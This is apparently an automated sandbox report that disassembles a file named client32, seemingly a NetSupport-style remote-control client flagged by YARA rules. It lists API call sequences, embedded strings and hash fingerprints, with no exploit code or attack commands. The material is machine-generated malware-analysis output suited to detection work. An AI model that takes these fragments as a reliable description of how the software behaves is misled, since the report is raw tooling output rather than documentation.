                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$CriticalInitializeSection_malloc_memsetwsprintf
                                                                              • String ID: ConfigList$PCICTL
                                                                              • API String ID: 4014706405-1939909508
                                                                              • Opcode ID: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
                                                                              • Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
                                                                              • Opcode Fuzzy Hash: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
                                                                              • Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50
                                                                              APIs
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110276B3
                                                                              • TranslateMessage.USER32(?), ref: 110276E1
                                                                              • DispatchMessageA.USER32(?), ref: 110276EB
                                                                              • Sleep.KERNEL32(000003E8), ref: 11027774
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110277DA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$DispatchSleepTranslate
                                                                              • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                              • API String ID: 3237117195-3850961587
                                                                              • Opcode ID: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                              • Instruction ID: fbec7a20b3d6bea2ef121ca85947d2bcd6ffbd352c9b2bb3e3957ab5b94ca35b
                                                                              • Opcode Fuzzy Hash: 1b2e4e5877f7dd86e5b4f6ab3deaa022a5885a0bf8ec40fba6a4f6effec7cce7
                                                                              • Instruction Fuzzy Hash: F241B375E026369BE711CBD5CC84EBABBA8FB58708F500539E925D3248EB359900CBA1
                                                                              APIs
                                                                              • GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
                                                                              • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
                                                                              • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                              • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                              • API String ID: 1092798621-1973987134
                                                                              • Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                              • Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
                                                                              • Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                              • Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 1100F554
                                                                              • __CxxThrowException@8.LIBCMT ref: 1100F562
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                              • String ID: bad cast
                                                                              • API String ID: 2427920155-3145022300
                                                                              • Opcode ID: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                              • Instruction ID: b8b94bd42515a6f19c70bc81b3c192d65964a6c5da2ad5a69908043983276998
                                                                              • Opcode Fuzzy Hash: 8ccc2bf3d075cb4470613d9a582e19481d5e19c5ba5466d2fc61ee55f0f68dd2
                                                                              • Instruction Fuzzy Hash: BB31E475D002169FDB05CF64D890BEEF7B8EB05369F44066DD926A7280DB72A904CF92
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(00000270,000003E8), ref: 1113572F
                                                                              • GetTickCount.KERNEL32 ref: 1113578C
                                                                                • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                              • wsprintfA.USER32 ref: 111357BC
                                                                                • Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702
                                                                              • WaitForSingleObject.KERNEL32(00000270,000003E8), ref: 11135802
                                                                              Strings
                                                                              • UI.CPP, xrefs: 111357E9
                                                                              • Client possibly unresponsive for %d ms (tid=%d)Callstack:, xrefs: 111357B6
                                                                              • ResponseChk, xrefs: 11135717
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountObjectSingleTickWait$ExitProcesswsprintf
                                                                              • String ID: Client possibly unresponsive for %d ms (tid=%d)Callstack:$ResponseChk$UI.CPP
                                                                              • API String ID: 2020353970-2880927372
                                                                              • Opcode ID: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                              • Instruction ID: 29029577b4cabcdd66728ddaf58dbb832e5c2d1ab8d81411842bafe300cf0b31
                                                                              • Opcode Fuzzy Hash: 5a95c3d6314c03e37156d318e81db83d91de3644f47b7d5644618cf8ee851fd7
                                                                              • Instruction Fuzzy Hash: 4331F431A01166DBE711CFA5CDC0FAAF3B8FB44719F400678E961DB688DB71A944CB91
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F1655
                                                                              • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F166A
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F16C3
                                                                              • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1708
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CreateName$ModulePathShort_strrchr
                                                                              • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                              • API String ID: 1318148156-3179819359
                                                                              • Opcode ID: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                              • Instruction ID: 97078bb132b3f47e4dd387b208782a62a76e0766a2a430eba886c9c4ac9a83c1
                                                                              • Opcode Fuzzy Hash: ec37fd08034eecc1aa46bd3ea59472c8ef6a7d7ee5c862681b8016f31a87d41d
                                                                              • Instruction Fuzzy Hash: 1A318130A44725AFD320DF64C891BD6B7F4BB1D708F008568E2A99B6C5D7B1B588CF94
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 11081859
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                              • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                              • API String ID: 1528188558-3417006389
                                                                              • Opcode ID: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                              • Instruction ID: 6b38151c30adb73325f8e92f0dfc04dea1f0409a136c72edecfa6b672fa6b7b9
                                                                              • Opcode Fuzzy Hash: 6f86106b110defa54479cabce7875bddb0ed7807cbaf2af13202954436eb8da3
                                                                              • Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2
                                                                              APIs
                                                                              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 1103F76C
                                                                              • SetDlgItemTextA.USER32(?,00000471,?), ref: 1103F784
                                                                              • DestroyCursor.USER32(00000000), ref: 1103F7A1
                                                                              • SetDlgItemTextA.USER32(?,00000471,00000000), ref: 1103F7B4
                                                                              • UpdateWindow.USER32(00000000), ref: 1103F7F2
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1103F7DC
                                                                              • m_hWnd, xrefs: 1103F7E1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemText$CursorDestroyExtractIconUpdateWindow_strrchr
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 3726914545-2830328467
                                                                              • Opcode ID: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                              • Instruction ID: 7fabd73ab2c015b19e51bb87ae7bab873905cbda80a3d362d09b7776c5ddc496
                                                                              • Opcode Fuzzy Hash: 73bb6436336379db390de3057b4568d21503c8f708411fbe6b6bfc52bf0a24e6
                                                                              • Instruction Fuzzy Hash: 4C21D1B9B40315BFE6219AA1DC86F5BB7A8AFC5B05F104418F79A9B2C0DBB4B4008756
                                                                              APIs
                                                                              • GetMenuItemCount.USER32(?), ref: 1115F62F
                                                                              • _memset.LIBCMT ref: 1115F64B
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 1115F65C
                                                                                • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                              • CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
                                                                              • EnableMenuItem.USER32(?,00000000,00000000), ref: 1115F6AE
                                                                              • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
                                                                              • String ID: 0
                                                                              • API String ID: 176136580-4108050209
                                                                              • Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                              • Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
                                                                              • Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
                                                                              • Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 1108132F
                                                                              • _memset.LIBCMT ref: 11081318
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                              • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                              • API String ID: 75970324-4264523126
                                                                              • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                              • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                              • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                              • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 1103F466
                                                                              • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                              • IsWindow.USER32(00000000), ref: 1103F484
                                                                              • Sleep.KERNEL32(00000014), ref: 1103F497
                                                                              • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                              • IsWindow.USER32(00000000), ref: 1103F4AF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Find$Sleep
                                                                              • String ID: PCIVideoSlave32
                                                                              • API String ID: 2137649973-2496367574
                                                                              • Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                              • Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
                                                                              • Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                              • Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EFF), ref: 1100340E
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 1100343A
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 1100345C
                                                                              • DestroyMenu.USER32(00000000), ref: 1100346A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 468487828-934300333
                                                                              • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                              • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                              • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                              • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                              • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                              • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 4241058051-934300333
                                                                              • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                              • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                              • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                              • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                              APIs
                                                                              • GetWindowTextA.USER32(?,?,00000050), ref: 11025766
                                                                              • _strncat.LIBCMT ref: 1102577B
                                                                              • SetWindowTextA.USER32(?,?), ref: 11025788
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025814
                                                                              • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025828
                                                                              • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
                                                                              • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
                                                                              • SetFocus.USER32(?), ref: 11025855
                                                                                • Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                              • String ID:
                                                                              • API String ID: 3832070631-0
                                                                              • Opcode ID: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                              • Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
                                                                              • Opcode Fuzzy Hash: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                              • Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54
                                                                              APIs
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
                                                                              • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111323D6,00000000,?), ref: 110EF7BD
                                                                              • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
                                                                              • GlobalLock.KERNEL32(00000000), ref: 110EF7EC
                                                                              • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 110EF825
                                                                              • GlobalFree.KERNEL32(00000000), ref: 110EF82C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                              • String ID:
                                                                              • API String ID: 3489003387-0
                                                                              • Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                              • Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
                                                                              • Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                              • Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2
                                                                              APIs
                                                                                • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
                                                                                • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D
                                                                              • GetParent.USER32(00000000), ref: 11089996
                                                                              • GetParent.USER32(00000000), ref: 110899A7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ParentWindow
                                                                              • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                              • API String ID: 3530579756-3361795001
                                                                              • Opcode ID: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                              • Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
                                                                              • Opcode Fuzzy Hash: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                              • Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91
                                                                              APIs
                                                                                • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,EE49F673,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 1101B776
                                                                              • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                              • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                              Strings
                                                                              • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                              • NSSecurity.dll, xrefs: 1101B7A3
                                                                              • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                              • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                              • API String ID: 3515807602-1044166025
                                                                              • Opcode ID: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                              • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                              • Opcode Fuzzy Hash: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                              • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,EE49F673,75A77CB0,75A77AA0,?,75A77CB0,75A77AA0), ref: 11071824
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 11071838
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                              • API String ID: 624642848-3840833929
                                                                              • Opcode ID: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                              • Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
                                                                              • Opcode Fuzzy Hash: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                              • Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4
                                                                              APIs
                                                                                • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                              • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
